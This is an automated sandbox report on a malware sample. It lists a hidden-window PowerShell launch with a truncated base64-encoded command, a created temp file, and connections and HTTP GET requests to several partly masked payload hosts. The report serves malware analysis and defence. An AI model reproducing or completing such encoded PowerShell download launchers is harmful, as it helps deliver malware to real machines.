Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGUAaABuAHYANQBsAD0AKAAoACcAWQAnACsAJwBnAG4AJwApACsAJwB2AHAAJwArACcAaQBvACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBzAEUAUgBwAFIAbwBmAGkAbABFAFwARQBpADEAcwBKAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
Modifies file system
Creates the following files
- %TEMP%\819067.cvr
Network activity
Connects to
- 'co##ub.de':80
- 'eg###tair.co.nz':80
- 'eg###tair.co.nz':443
- 'fa#####aarcobaleno.ch':80
- 'fa#####aarcobaleno.ch':443
- 'es####malibe.com.br':80
TCP
HTTP GET requests
- http://co##ub.de/cgi-bin/qgi3ncv70163850/
- http://eg###tair.co.nz/css/file/yUULClon/
- http://fa#####aarcobaleno.ch/wp-snapshots/PNXFHEqzTK/
Other
- 'eg###tair.co.nz':443
- 'fa#####aarcobaleno.ch':443
UDP
- DNS ASK co##ub.de
- DNS ASK ar#####oposlovanje.com
- DNS ASK dr###-estate.ch
- DNS ASK eg###tair.co.nz
- DNS ASK fa#####aarcobaleno.ch
- DNS ASK es####malibe.com.br
- DNS ASK fa##e.fr
Miscellaneous
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGUAaABuAHYANQBsAD0AKAAoACcAWQAnACsAJwBnAG4AJwApACsAJwB2AHAAJwArACcAaQBvACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBzAEUAUgBwAFIAbwBmAGkAbABFAFwARQBpADEAcwBKAD...' (with hidden window)
